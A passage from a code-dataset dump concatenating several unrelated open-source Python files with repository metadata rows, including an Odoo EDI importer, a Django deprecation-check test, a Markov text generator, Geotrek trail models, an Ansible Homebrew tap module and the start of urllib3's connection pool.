'res_id': record.id,
'type': 'binary'
},
context=context)
def _edi_import_attachments(self, cr, uid, record_id, edi, context=None):
ir_attachment = self.pool.get('ir.attachment')
for attachment in edi.get('__attachments', []):
# check attachment data is non-empty and valid
file_data = None
try:
file_data = base64.b64decode(attachment.get('content'))
except TypeError:
pass
assert file_data, 'Incorrect/Missing attachment file content.'
assert attachment.get('name'), 'Incorrect/Missing attachment name.'
            assert attachment.get('file_name'), 'Incorrect/Missing attachment file name.'
ir_attachment.create(cr, uid, {'name': attachment['name'],
'datas_fname': attachment['file_name'],
'res_model': self._name,
'res_id': record_id,
# should be pure 7bit ASCII
'datas': str(attachment['content']),
}, context=context)
def _edi_get_object_by_external_id(self, cr, uid, external_id, model, context=None):
"""Returns browse_record representing object identified by the model and external_id,
or None if no record was found with this external id.
:param external_id: fully qualified external id, in the EDI form
``module:db_uuid:identifier``.
:param model: model name the record belongs to.
"""
ir_model_data = self.pool.get('ir.model.data')
# external_id is expected to have the form: ``module:db_uuid:model.random_name``
ext_id_members = split_external_id(external_id)
db_uuid = self.pool.get('ir.config_parameter').get_param(cr, uid, 'database.uuid')
module = ext_id_members['module']
ext_id = ext_id_members['id']
modules = []
ext_db_uuid = ext_id_members['db_uuid']
if ext_db_uuid:
modules.append('%s:%s' % (module, ext_id_members['db_uuid']))
if ext_db_uuid is None or ext_db_uuid == db_uuid:
# local records may also be registered without the db_uuid
modules.append(module)
data_ids = ir_model_data.search(cr, uid, [('model','=',model),
('name','=',ext_id),
('module','in',modules)])
if data_ids:
model = self.pool[model]
data = ir_model_data.browse(cr, uid, data_ids[0], context=context)
if model.exists(cr, uid, [data.res_id]):
return model.browse(cr, uid, data.res_id, context=context)
# stale external-id, cleanup to allow re-import, as the corresponding record is gone
ir_model_data.unlink(cr, 1, [data_ids[0]])
def edi_import_relation(self, cr, uid, model, value, external_id, context=None):
"""Imports a M2O/M2M relation EDI specification ``[external_id,value]`` for the
given model, returning the corresponding database ID:
* First, checks if the ``external_id`` is already known, in which case the corresponding
database ID is directly returned, without doing anything else;
* If the ``external_id`` is unknown, attempts to locate an existing record
with the same ``value`` via name_search(). If found, the given external_id will
be assigned to this local record (in addition to any existing one)
* If previous steps gave no result, create a new record with the given
value in the target model, assign it the given external_id, and return
the new database ID
:param str value: display name of the record to import
:param str external_id: fully-qualified external ID of the record
:return: database id of newly-imported or pre-existing record
"""
_logger.debug("%s: Importing EDI relationship [%r,%r]", model, external_id, value)
target = self._edi_get_object_by_external_id(cr, uid, external_id, model, context=context)
need_new_ext_id = False
if not target:
_logger.debug("%s: Importing EDI relationship [%r,%r] - ID not found, trying name_get.",
self._name, external_id, value)
target = self._edi_get_object_by_name(cr, uid, value, model, context=context)
need_new_ext_id = True
if not target:
_logger.debug("%s: Importing EDI relationship [%r,%r] - name not found, creating it.",
self._name, external_id, value)
# also need_new_ext_id here, but already been set above
model = self.pool[model]
res_id, _ = model.name_create(cr, uid, value, context=context)
target = model.browse(cr, uid, res_id, context=context)
else:
_logger.debug("%s: Importing EDI relationship [%r,%r] - record already exists with ID %s, using it",
self._name, external_id, value, target.id)
if need_new_ext_id:
ext_id_members = split_external_id(external_id)
# module name is never used bare when creating ir.model.data entries, in order
# to avoid being taken as part of the module's data, and cleanup up at next update
module = "%s:%s" % (ext_id_members['module'], ext_id_members['db_uuid'])
# create a new ir.model.data entry for this value
self._edi_external_id(cr, uid, target, existing_id=ext_id_members['id'], existing_module=module, context=context)
return target.id
def edi_import(self, cr, uid, edi, context=None):
"""Imports a dict representing an EDI document into the system.
:param dict edi: EDI document to import
:return: the database ID of the imported record
"""
assert self._name == edi.get('__import_model') or \
('__import_model' not in edi and self._name == edi.get('__model')), \
"EDI Document Model and current model do not match: '%s' (EDI) vs '%s' (current)." % \
(edi.get('__model'), self._name)
# First check the record is now already known in the database, in which case it is ignored
ext_id_members = split_external_id(edi['__id'])
existing = self._edi_get_object_by_external_id(cr, uid, ext_id_members['full'], self._name, context=context)
if existing:
_logger.info("'%s' EDI Document with ID '%s' is already known, skipping import!", self._name, ext_id_members['full'])
return existing.id
record_values = {}
o2m_todo = {} # o2m values are processed after their parent already exists
for field_name, field_value in edi.iteritems():
# skip metadata and empty fields
if field_name.startswith('__') or field_value is None or field_value is False:
continue
field = self._fields.get(field_name)
if not field:
_logger.warning('Ignoring unknown field `%s` when importing `%s` EDI document.', field_name, self._name)
continue
# skip function/related fields
if not field.store:
_logger.warning("Unexpected function field value is found in '%s' EDI document: '%s'." % (self._name, field_name))
continue
relation_model = field.comodel_name
if field.type == 'many2one':
record_values[field_name] = self.edi_import_relation(cr, uid, relation_model,
field_value[1], field_value[0],
context=context)
elif field.type == 'many2many':
record_values[field_name] = [self.edi_import_relation(cr, uid, relation_model, m2m_value[1],
m2m_value[0], context=context)
for m2m_value in field_value]
elif field.type == 'one2many':
                # must wait until the parent record is imported, as the parent relationship
# is often required in o2m child records
o2m_todo[field_name] = field_value
else:
record_values[field_name] = field_value
module_ref = "%s:%s" % (ext_id_members['module'], ext_id_members['db_uuid'])
record_id = self.pool.get('ir.model.data')._update(cr, uid, self._name, module_ref, record_values,
xml_id=ext_id_members['id'], context=context)
record_display, = self.name_get(cr, uid, [record_id], context=context)
# process o2m values, connecting them to their parent on-the-fly
for o2m_field, o2m_value in o2m_todo.iteritems():
field = self._fields[o2m_field]
dest_model = self.pool[field.comodel_name]
dest_field = field.inverse_name
for o2m_line in o2m_value:
# link to parent record: expects an (ext_id, name) pair
o2m_line[dest_field] = (ext_id_members['full'], record_display[1])
dest_model.edi_import(cr, uid, o2m_line, context=context)
# process the attachments, if any
self._edi_import_attachments(cr, uid, record_id, edi, context=context)
return record_id
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -5,793,261,309,824,443,000 | 51.712871 | 139 | 0.557726 | false |
RossBrunton/django | tests/check_framework/test_model_field_deprecation.py | 322 | 2584 | from django.core import checks
from django.db import models
from django.test import SimpleTestCase
from .tests import IsolateModelsMixin
class TestDeprecatedField(IsolateModelsMixin, SimpleTestCase):
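    # A field class that defines `system_check_deprecated_details` should make
    # model checks emit a checks.Warning (default id "fields.WXXX", or the
    # user-supplied msg/hint/id when the dict overrides them).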
def test_default_details(self):
class MyField(models.Field):
system_check_deprecated_details = {}
class Model(models.Model):
name = MyField()
model = Model()
self.assertEqual(model.check(), [
checks.Warning(
msg='MyField has been deprecated.',
hint=None,
obj=Model._meta.get_field('name'),
id='fields.WXXX',
)
])
def test_user_specified_details(self):
class MyField(models.Field):
system_check_deprecated_details = {
'msg': 'This field is deprecated and will be removed soon.',
'hint': 'Use something else.',
'id': 'fields.W999',
}
class Model(models.Model):
name = MyField()
model = Model()
self.assertEqual(model.check(), [
checks.Warning(
msg='This field is deprecated and will be removed soon.',
hint='Use something else.',
obj=Model._meta.get_field('name'),
id='fields.W999',
)
])
class TestRemovedField(IsolateModelsMixin, SimpleTestCase):
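    # Same idea for removed fields: `system_check_removed_details` should make
    # model checks emit a checks.Error (default id "fields.EXXX").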
def test_default_details(self):
class MyField(models.Field):
system_check_removed_details = {}
class Model(models.Model):
name = MyField()
model = Model()
self.assertEqual(model.check(), [
checks.Error(
msg='MyField has been removed except for support in historical migrations.',
hint=None,
obj=Model._meta.get_field('name'),
id='fields.EXXX',
)
])
def test_user_specified_details(self):
class MyField(models.Field):
system_check_removed_details = {
'msg': 'Support for this field is gone.',
'hint': 'Use something else.',
'id': 'fields.E999',
}
class Model(models.Model):
name = MyField()
model = Model()
self.assertEqual(model.check(), [
checks.Error(
msg='Support for this field is gone.',
hint='Use something else.',
obj=Model._meta.get_field('name'),
id='fields.E999',
)
])
| bsd-3-clause | -2,592,567,449,084,340,700 | 29.4 | 92 | 0.522059 | false |
elemson/codeacademyfinalproj | cc_markov.py | 4 | 2430 | import re
import random
from collections import defaultdict, deque
"""
Codecademy Pro Final Project supplementary code
Markov Chain generator
This is a text generator that uses Markov Chains to generate text, picking
each next word uniformly at random from the stored successors (so words that
follow a key more often are proportionally more likely to be chosen).
num_key_words is the number of words that compose a key (suggested: 2 or 3)
"""
class MarkovChain:
def __init__(self, num_key_words=2):
self.num_key_words = num_key_words
self.lookup_dict = defaultdict(list)
self._punctuation_regex = re.compile('[,.!;\?\:\-\[\]\n]+')
self._seeded = False
self.__seed_me()
def __seed_me(self, rand_seed=None):
if self._seeded is not True:
try:
if rand_seed is not None:
random.seed(rand_seed)
else:
random.seed()
self._seeded = True
except NotImplementedError:
self._seeded = False
"""
" Build Markov Chain from data source.
" Use add_file() or add_string() to add the appropriate format source
"""
def add_file(self, file_path):
with open(file_path, 'r') as fh:
self.__add_source_data(fh.read())
def add_string(self, str):
self.__add_source_data(str)
def __add_source_data(self, str):
clean_str = self._punctuation_regex.sub(' ', str).lower()
tuples = self.__generate_tuple_keys(clean_str.split())
for t in tuples:
self.lookup_dict[t[0]].append(t[1])
def __generate_tuple_keys(self, data):
if len(data) < self.num_key_words:
return
for i in xrange(len(data) - self.num_key_words):
yield [ tuple(data[i:i+self.num_key_words]), data[i+self.num_key_words] ]
"""
" Generates text based on the data the Markov Chain contains
" max_length is the maximum number of words to generate
"""
def generate_text(self, max_length=20):
context = deque()
output = []
if len(self.lookup_dict) > 0:
self.__seed_me(rand_seed=len(self.lookup_dict))
idx = random.randint(0, len(self.lookup_dict)-1)
chain_head = list(self.lookup_dict.keys()[idx])
context.extend(chain_head)
while len(output) < (max_length - self.num_key_words):
next_choices = self.lookup_dict[tuple(context)]
if len(next_choices) > 0:
next_word = random.choice(next_choices)
context.append(next_word)
output.append(context.popleft())
else:
break
output.extend(list(context))
return output
| gpl-2.0 | -7,707,940,413,404,563,000 | 28.277108 | 79 | 0.631276 | false |
Anaethelion/Geotrek | geotrek/core/models.py | 1 | 20663 | # -*- coding: utf-8 -*-
import logging
import functools
from django.contrib.gis.db import models
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from django.contrib.gis.geos import fromstr, LineString
from mapentity.models import MapEntityMixin
from geotrek.authent.models import StructureRelated
from geotrek.common.mixins import (TimeStampedModelMixin, NoDeleteMixin,
AddPropertyMixin)
from geotrek.common.utils import classproperty
from geotrek.common.utils.postgresql import debug_pg_notices
from geotrek.altimetry.models import AltimetryMixin
from .helpers import PathHelper, TopologyHelper
from django.db import connections, DEFAULT_DB_ALIAS
logger = logging.getLogger(__name__)
class PathManager(models.GeoManager):
# Use this manager when walking through FK/M2M relationships
use_for_related_fields = True
def get_queryset(self):
"""Hide all ``Path`` records that are not marked as visible.
"""
return super(PathManager, self).get_queryset().filter(visible=True)
# GeoDjango note:
# Django automatically creates indexes on geometry fields but it uses a
# syntax which is not compatible with PostGIS 2.0. That's why index creation
# is explicitly disabled here (see manual index creation in custom SQL files).
class Path(AddPropertyMixin, MapEntityMixin, AltimetryMixin,
TimeStampedModelMixin, StructureRelated):
geom = models.LineStringField(srid=settings.SRID, spatial_index=False)
geom_cadastre = models.LineStringField(null=True, srid=settings.SRID, spatial_index=False,
editable=False)
valid = models.BooleanField(db_column='valide', default=True, verbose_name=_(u"Validity"),
help_text=_(u"Approved by manager"))
visible = models.BooleanField(db_column='visible', default=True, verbose_name=_(u"Visible"),
help_text=_(u"Shown in lists and maps"))
name = models.CharField(null=True, blank=True, max_length=20, db_column='nom', verbose_name=_(u"Name"),
help_text=_(u"Official name"))
comments = models.TextField(null=True, blank=True, db_column='remarques', verbose_name=_(u"Comments"),
help_text=_(u"Remarks"))
departure = models.CharField(null=True, blank=True, default="", max_length=250, db_column='depart', verbose_name=_(u"Departure"),
help_text=_(u"Departure place"))
arrival = models.CharField(null=True, blank=True, default="", max_length=250, db_column='arrivee', verbose_name=_(u"Arrival"),
help_text=_(u"Arrival place"))
comfort = models.ForeignKey('Comfort',
null=True, blank=True, related_name='paths',
verbose_name=_("Comfort"), db_column='confort')
source = models.ForeignKey('PathSource',
null=True, blank=True, related_name='paths',
verbose_name=_("Source"), db_column='source')
stake = models.ForeignKey('Stake',
null=True, blank=True, related_name='paths',
verbose_name=_("Maintenance stake"), db_column='enjeu')
usages = models.ManyToManyField('Usage',
blank=True, null=True, related_name="paths",
verbose_name=_(u"Usages"), db_table="l_r_troncon_usage")
networks = models.ManyToManyField('Network',
blank=True, null=True, related_name="paths",
verbose_name=_(u"Networks"), db_table="l_r_troncon_reseau")
eid = models.CharField(verbose_name=_(u"External id"), max_length=128, blank=True, db_column='id_externe')
objects = PathManager()
is_reversed = False
@property
def length_2d(self):
if self.geom:
return round(self.geom.length, 1)
else:
return None
@classproperty
def length_2d_verbose_name(cls):
return _(u"2D Length")
@property
def length_2d_display(self):
return self.length_2d
def __unicode__(self):
return self.name or _('path %d') % self.pk
class Meta:
db_table = 'l_t_troncon'
verbose_name = _(u"Path")
verbose_name_plural = _(u"Paths")
@classmethod
def closest(cls, point):
"""
        Returns the path closest to the given point.
        Will fail if there is no path in the database.
"""
# TODO: move to custom manager
if point.srid != settings.SRID:
point = point.transform(settings.SRID, clone=True)
return cls.objects.all().distance(point).order_by('distance')[0]
def is_overlap(self):
return not PathHelper.disjoint(self.geom, self.pk)
def reverse(self):
"""
Reverse the geometry.
We keep track of this, since we will have to work on topologies at save()
"""
reversed_coord = self.geom.coords[-1::-1]
self.geom = LineString(reversed_coord)
self.is_reversed = True
return self
def interpolate(self, point):
"""
Returns position ([0.0-1.0]) and offset (distance) of the point
along this path.
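        Illustrative example (values made up): a point halfway along the path
        and about 5 metres away from it would give roughly (0.5, 5.0), the
        offset being expressed in SRID units.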
"""
return PathHelper.interpolate(self, point)
def snap(self, point):
"""
Returns the point snapped (i.e closest) to the path line geometry.
"""
return PathHelper.snap(self, point)
def reload(self, fromdb=None):
# Update object's computed values (reload from database)
if self.pk and self.visible:
fromdb = self.__class__.objects.get(pk=self.pk)
self.geom = fromdb.geom
AltimetryMixin.reload(self, fromdb)
TimeStampedModelMixin.reload(self, fromdb)
return self
@debug_pg_notices
def save(self, *args, **kwargs):
# If the path was reversed, we have to invert related topologies
if self.is_reversed:
for aggr in self.aggregations.all():
aggr.start_position = 1 - aggr.start_position
aggr.end_position = 1 - aggr.end_position
aggr.save()
self._is_reversed = False
super(Path, self).save(*args, **kwargs)
self.reload()
@property
def name_display(self):
return u'<a data-pk="%s" href="%s" title="%s" >%s</a>' % (self.pk,
self.get_detail_url(),
self,
self)
@property
def name_csv_display(self):
return unicode(self)
@classproperty
def trails_verbose_name(cls):
return _("Trails")
@property
def trails_display(self):
trails = getattr(self, '_trails', self.trails)
if trails:
return ", ".join([t.name_display for t in trails])
return _("None")
@property
def trails_csv_display(self):
trails = getattr(self, '_trails', self.trails)
if trails:
return ", ".join([unicode(t) for t in trails])
return _("None")
@classmethod
def get_create_label(cls):
return _(u"Add a new path")
@property
def checkbox(self):
return u'<input type="checkbox" name="{}[]" value="{}" />'.format('path',
self.pk)
@classproperty
def checkbox_verbose_name(cls):
return _("Action")
@property
def checkbox_display(self):
return self.checkbox
def merge_path(self, path_to_merge):
"""
Path unification
:param path_to path_to_merge: Path instance to merge
:return: Boolean
"""
if (self.pk and path_to_merge) and (self.pk != path_to_merge.pk):
conn = connections[DEFAULT_DB_ALIAS]
cursor = conn.cursor()
sql = "SELECT ft_merge_path({}, {});".format(self.pk, path_to_merge.pk)
cursor.execute(sql)
result = cursor.fetchall()[0][0]
if result:
# reload object after unification
self.reload()
return result
class Topology(AddPropertyMixin, AltimetryMixin, TimeStampedModelMixin, NoDeleteMixin):
paths = models.ManyToManyField(Path, db_column='troncons', through='PathAggregation', verbose_name=_(u"Path"))
offset = models.FloatField(default=0.0, db_column='decallage', verbose_name=_(u"Offset")) # in SRID units
kind = models.CharField(editable=False, verbose_name=_(u"Kind"), max_length=32)
# Override default manager
objects = NoDeleteMixin.get_manager_cls(models.GeoManager)()
geom = models.GeometryField(editable=(not settings.TREKKING_TOPOLOGY_ENABLED),
srid=settings.SRID, null=True,
default=None, spatial_index=False)
""" Fake srid attribute, that prevents transform() calls when using Django map widgets. """
srid = settings.API_SRID
class Meta:
db_table = 'e_t_evenement'
verbose_name = _(u"Topology")
verbose_name_plural = _(u"Topologies")
def __init__(self, *args, **kwargs):
super(Topology, self).__init__(*args, **kwargs)
if not self.pk:
self.kind = self.__class__.KIND
@property
def length_2d(self):
if self.geom and not self.ispoint():
return round(self.geom.length, 1)
else:
return None
@classproperty
def length_2d_verbose_name(cls):
return _(u"2D Length")
@property
def length_2d_display(self):
return self.length_2d
@classproperty
def KIND(cls):
return cls._meta.object_name.upper()
def __unicode__(self):
return u"%s (%s)" % (_(u"Topology"), self.pk)
def ispoint(self):
if not settings.TREKKING_TOPOLOGY_ENABLED or not self.pk:
return self.geom and self.geom.geom_type == 'Point'
return all([a.start_position == a.end_position for a in self.aggregations.all()])
def add_path(self, path, start=0.0, end=1.0, order=0, reload=True):
"""
Shortcut function to add paths into this topology.
"""
from .factories import PathAggregationFactory
aggr = PathAggregationFactory.create(topo_object=self,
path=path,
start_position=start,
end_position=end,
order=order)
if self.deleted:
self.deleted = False
self.save(update_fields=['deleted'])
# Since a trigger modifies geom, we reload the object
if reload:
self.reload()
return aggr
@classmethod
def overlapping(cls, topologies):
""" Return a Topology queryset overlapping specified topologies.
"""
return TopologyHelper.overlapping(cls, topologies)
def mutate(self, other, delete=True):
"""
        Take all attributes of the other specified topology and
        save them into this one. Optionally deletes the other.
"""
self.offset = other.offset
self.save(update_fields=['offset'])
PathAggregation.objects.filter(topo_object=self).delete()
# The previous operation has put deleted = True (in triggers)
# and NULL in geom (see update_geometry_of_evenement:: IF t_count = 0)
self.deleted = False
self.geom = other.geom
self.save(update_fields=['deleted', 'geom'])
# Now copy all agregations from other to self
aggrs = other.aggregations.all()
# A point has only one aggregation, except if it is on an intersection.
# In this case, the trigger will create them, so ignore them here.
if other.ispoint():
aggrs = aggrs[:1]
for aggr in aggrs:
self.add_path(aggr.path, aggr.start_position, aggr.end_position, aggr.order, reload=False)
self.reload()
if delete:
other.delete(force=True) # Really delete it from database
return self
def reload(self, fromdb=None):
"""
        Reload into this instance all attributes computed by database triggers.
"""
if self.pk:
# Update computed values
fromdb = self.__class__.objects.get(pk=self.pk)
self.geom = fromdb.geom
# /!\ offset may be set by a trigger OR in
# the django code, reload() will override
# any unsaved value
self.offset = fromdb.offset
AltimetryMixin.reload(self, fromdb)
TimeStampedModelMixin.reload(self, fromdb)
NoDeleteMixin.reload(self, fromdb)
return self
@debug_pg_notices
def save(self, *args, **kwargs):
# HACK: these fields are readonly from the Django point of view
        # but they can be changed at DB level. Since Django writes all fields
        # to DB anyway, it is important to update them before writing
if self.pk and settings.TREKKING_TOPOLOGY_ENABLED:
existing = self.__class__.objects.get(pk=self.pk)
self.length = existing.length
# In the case of points, the geom can be set by Django. Don't override.
point_geom_not_set = self.ispoint() and self.geom is None
geom_already_in_db = not self.ispoint() and existing.geom is not None
if (point_geom_not_set or geom_already_in_db):
self.geom = existing.geom
else:
if not self.deleted and self.geom is None:
# We cannot have NULL geometry. So we use an empty one,
# it will be computed or overwritten by triggers.
self.geom = fromstr('POINT (0 0)')
if not self.kind:
if self.KIND == "TOPOLOGYMIXIN":
raise Exception("Cannot save abstract topologies")
self.kind = self.__class__.KIND
# Static value for Topology offset, if any
shortmodelname = self._meta.object_name.lower().replace('edge', '')
self.offset = settings.TOPOLOGY_STATIC_OFFSETS.get(shortmodelname, self.offset)
# Save into db
super(Topology, self).save(*args, **kwargs)
self.reload()
def serialize(self, **kwargs):
return TopologyHelper.serialize(self, **kwargs)
@classmethod
def deserialize(cls, serialized):
return TopologyHelper.deserialize(serialized)
def distance(self, to_cls):
"""Distance to associate this topology to another topology class"""
return None
class PathAggregationManager(models.GeoManager):
def get_queryset(self):
return super(PathAggregationManager, self).get_queryset().order_by('order')
class PathAggregation(models.Model):
path = models.ForeignKey(Path, null=False, db_column='troncon',
verbose_name=_(u"Path"),
related_name="aggregations",
on_delete=models.DO_NOTHING) # The CASCADE behavior is enforced at DB-level (see file ../sql/20_evenements_troncons.sql)
topo_object = models.ForeignKey(Topology, null=False, related_name="aggregations",
db_column='evenement', verbose_name=_(u"Topology"))
start_position = models.FloatField(db_column='pk_debut', verbose_name=_(u"Start position"), db_index=True)
end_position = models.FloatField(db_column='pk_fin', verbose_name=_(u"End position"), db_index=True)
order = models.IntegerField(db_column='ordre', default=0, blank=True, null=True, verbose_name=_(u"Order"))
# Override default manager
objects = PathAggregationManager()
def __unicode__(self):
return u"%s (%s-%s: %s - %s)" % (_("Path aggregation"), self.path.pk, self.path.name, self.start_position, self.end_position)
@property
def start_meter(self):
try:
return 0 if self.start_position == 0.0 else int(self.start_position * self.path.length)
except ValueError:
return -1
@property
def end_meter(self):
try:
return 0 if self.end_position == 0.0 else int(self.end_position * self.path.length)
except ValueError:
return -1
@property
def is_full(self):
return (self.start_position == 0.0 and self.end_position == 1.0 or
self.start_position == 1.0 and self.end_position == 0.0)
@debug_pg_notices
def save(self, *args, **kwargs):
return super(PathAggregation, self).save(*args, **kwargs)
class Meta:
db_table = 'e_r_evenement_troncon'
verbose_name = _(u"Path aggregation")
verbose_name_plural = _(u"Path aggregations")
# Important - represent the order of the path in the Topology path list
ordering = ['order', ]
class PathSource(StructureRelated):
source = models.CharField(verbose_name=_(u"Source"), max_length=50)
class Meta:
db_table = 'l_b_source_troncon'
verbose_name = _(u"Path source")
verbose_name_plural = _(u"Path sources")
ordering = ['source']
def __unicode__(self):
return self.source
@functools.total_ordering
class Stake(StructureRelated):
stake = models.CharField(verbose_name=_(u"Stake"), max_length=50, db_column='enjeu')
class Meta:
db_table = 'l_b_enjeu'
verbose_name = _(u"Maintenance stake")
verbose_name_plural = _(u"Maintenance stakes")
ordering = ['id']
def __lt__(self, other):
if other is None:
return False
return self.pk < other.pk
def __eq__(self, other):
return isinstance(other, Stake) \
and self.pk == other.pk
def __unicode__(self):
return self.stake
class Comfort(StructureRelated):
comfort = models.CharField(verbose_name=_(u"Comfort"), max_length=50, db_column='confort')
class Meta:
db_table = 'l_b_confort'
verbose_name = _(u"Comfort")
verbose_name_plural = _(u"Comforts")
ordering = ['comfort']
def __unicode__(self):
return self.comfort
class Usage(StructureRelated):
usage = models.CharField(verbose_name=_(u"Usage"), max_length=50, db_column='usage')
class Meta:
db_table = 'l_b_usage'
verbose_name = _(u"Usage")
verbose_name_plural = _(u"Usages")
ordering = ['usage']
def __unicode__(self):
return self.usage
class Network(StructureRelated):
network = models.CharField(verbose_name=_(u"Network"), max_length=50, db_column='reseau')
class Meta:
db_table = 'l_b_reseau'
verbose_name = _(u"Network")
verbose_name_plural = _(u"Networks")
ordering = ['network']
def __unicode__(self):
return self.network
class Trail(MapEntityMixin, Topology, StructureRelated):
topo_object = models.OneToOneField(Topology, parent_link=True,
db_column='evenement')
name = models.CharField(verbose_name=_(u"Name"), max_length=64, db_column='nom')
departure = models.CharField(verbose_name=_(u"Departure"), max_length=64, db_column='depart')
arrival = models.CharField(verbose_name=_(u"Arrival"), max_length=64, db_column='arrivee')
comments = models.TextField(default="", blank=True, verbose_name=_(u"Comments"), db_column='commentaire')
class Meta:
db_table = 'l_t_sentier'
verbose_name = _(u"Trail")
verbose_name_plural = _(u"Trails")
ordering = ['name']
objects = Topology.get_manager_cls(models.GeoManager)()
def __unicode__(self):
return self.name
@property
def name_display(self):
return u'<a data-pk="%s" href="%s" title="%s" >%s</a>' % (self.pk,
self.get_detail_url(),
self,
self)
@classmethod
def path_trails(cls, path):
return cls.objects.existing().filter(aggregations__path=path)
Path.add_property('trails', lambda self: Trail.path_trails(self), _(u"Trails"))
Topology.add_property('trails', lambda self: Trail.overlapping(self), _(u"Trails"))
| bsd-2-clause | -6,801,243,864,983,624,000 | 35.832442 | 150 | 0.586507 | false |
dispansible/dispansible | ansible/library/disp_homebrew_tap.py | 1 | 5742 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Daniel Jaouen <[email protected]>
# Based on homebrew (Andrew Dunham <[email protected]>)
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import re
DOCUMENTATION = '''
---
module: homebrew_tap
author: Daniel Jaouen
short_description: Tap a Homebrew repository.
description:
- Tap external Homebrew repositories.
version_added: "1.6"
options:
tap:
description:
- The repository to tap.
required: true
state:
description:
- state of the repository.
choices: [ 'present', 'absent' ]
required: false
default: 'present'
requirements: [ homebrew ]
'''
EXAMPLES = '''
homebrew_tap: tap=homebrew/dupes state=present
homebrew_tap: tap=homebrew/dupes state=absent
homebrew_tap: tap=homebrew/dupes,homebrew/science state=present
'''
def a_valid_tap(tap):
'''Returns True if the tap is valid.'''
regex = re.compile(r'^([\w-]+)/(homebrew-)?([\w-]+)$')
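    # Accepted forms: "user/repo" or "user/homebrew-repo", e.g.
    # "homebrew/science" or "caskroom/homebrew-cask" (examples are illustrative).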
return regex.match(tap)
def already_tapped(module, brew_path, tap):
'''Returns True if already tapped.'''
rc, out, err = module.run_command([
brew_path,
'tap',
])
taps = [tap_.strip().lower() for tap_ in out.split('\n') if tap_]
return tap.lower() in taps
def add_tap(module, brew_path, tap):
'''Adds a single tap.'''
failed, changed, msg = False, False, ''
if not a_valid_tap(tap):
failed = True
msg = 'not a valid tap: %s' % tap
elif not already_tapped(module, brew_path, tap):
if module.check_mode:
module.exit_json(changed=True)
rc, out, err = module.run_command([
brew_path,
'tap',
tap,
])
if already_tapped(module, brew_path, tap):
changed = True
msg = 'successfully tapped: %s' % tap
else:
failed = True
msg = 'failed to tap: %s' % tap
else:
msg = 'already tapped: %s' % tap
return (failed, changed, msg)
def add_taps(module, brew_path, taps):
'''Adds one or more taps.'''
failed, unchanged, added, msg = False, 0, 0, ''
for tap in taps:
(failed, changed, msg) = add_tap(module, brew_path, tap)
if failed:
break
if changed:
added += 1
else:
unchanged += 1
if failed:
msg = 'added: %d, unchanged: %d, error: ' + msg
msg = msg % (added, unchanged)
elif added:
changed = True
msg = 'added: %d, unchanged: %d' % (added, unchanged)
else:
msg = 'added: %d, unchanged: %d' % (added, unchanged)
return (failed, changed, msg)
def remove_tap(module, brew_path, tap):
'''Removes a single tap.'''
failed, changed, msg = False, False, ''
if not a_valid_tap(tap):
failed = True
msg = 'not a valid tap: %s' % tap
elif already_tapped(module, brew_path, tap):
if module.check_mode:
module.exit_json(changed=True)
rc, out, err = module.run_command([
brew_path,
'untap',
tap,
])
if not already_tapped(module, brew_path, tap):
changed = True
msg = 'successfully untapped: %s' % tap
else:
failed = True
msg = 'failed to untap: %s' % tap
else:
msg = 'already untapped: %s' % tap
return (failed, changed, msg)
def remove_taps(module, brew_path, taps):
'''Removes one or more taps.'''
failed, unchanged, removed, msg = False, 0, 0, ''
for tap in taps:
(failed, changed, msg) = remove_tap(module, brew_path, tap)
if failed:
break
if changed:
removed += 1
else:
unchanged += 1
if failed:
msg = 'removed: %d, unchanged: %d, error: ' + msg
msg = msg % (removed, unchanged)
elif removed:
changed = True
msg = 'removed: %d, unchanged: %d' % (removed, unchanged)
else:
msg = 'removed: %d, unchanged: %d' % (removed, unchanged)
return (failed, changed, msg)
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(aliases=['tap'], required=True),
state=dict(default='present', choices=['present', 'absent']),
),
supports_check_mode=True,
)
brew_path = module.get_bin_path(
'brew',
required=True,
opt_dirs=['/usr/local/bin', '~/.linuxbrew/bin']
)
taps = module.params['name'].split(',')
if module.params['state'] == 'present':
failed, changed, msg = add_taps(module, brew_path, taps)
if failed:
module.fail_json(msg=msg)
else:
module.exit_json(changed=changed, msg=msg)
elif module.params['state'] == 'absent':
failed, changed, msg = remove_taps(module, brew_path, taps)
if failed:
module.fail_json(msg=msg)
else:
module.exit_json(changed=changed, msg=msg)
# this is magic, see lib/ansible/module_common.py
#<<INCLUDE_ANSIBLE_MODULE_COMMON>>
main()
| mit | -3,955,033,150,162,051,600 | 25.706977 | 73 | 0.575235 | false |
tuxfux-hlp-notes/python-batches | archieves/batch-62/files/myenv/lib/python2.7/site-packages/pip/_vendor/requests/packages/urllib3/connectionpool.py | 359 | 33591 | from __future__ import absolute_import
import errno
import logging
import sys
import warnings
from socket import error as SocketError, timeout as SocketTimeout
import socket
try: # Python 3
from queue import LifoQueue, Empty, Full
except ImportError:
from Queue import LifoQueue, Empty, Full
# Queue is imported for side effects on MS Windows
import Queue as _unused_module_Queue # noqa: unused
from .exceptions import (
ClosedPoolError,
ProtocolError,
EmptyPoolError,
HeaderParsingError,
HostChangedError,
LocationValueError,
MaxRetryError,
ProxyError,
ReadTimeoutError,
SSLError,
TimeoutError,
InsecureRequestWarning,
NewConnectionError,
)
from .packages.ssl_match_hostname import CertificateError
from .packages import six
from .connection import (
port_by_scheme,
DummyConnection,
HTTPConnection, HTTPSConnection, VerifiedHTTPSConnection,
HTTPException, BaseSSLError,
)
from .request import RequestMethods
from .response import HTTPResponse
from .util.connection import is_connection_dropped
from .util.response import assert_header_parsing
from .util.retry import Retry
from .util.timeout import Timeout
from .util.url import get_host, Url
xrange = six.moves.xrange
log = logging.getLogger(__name__)
_Default = object()
# Pool objects
class ConnectionPool(object):
"""
Base class for all connection pools, such as
:class:`.HTTPConnectionPool` and :class:`.HTTPSConnectionPool`.
"""
scheme = None
QueueCls = LifoQueue
def __init__(self, host, port=None):
if not host:
raise LocationValueError("No host specified.")
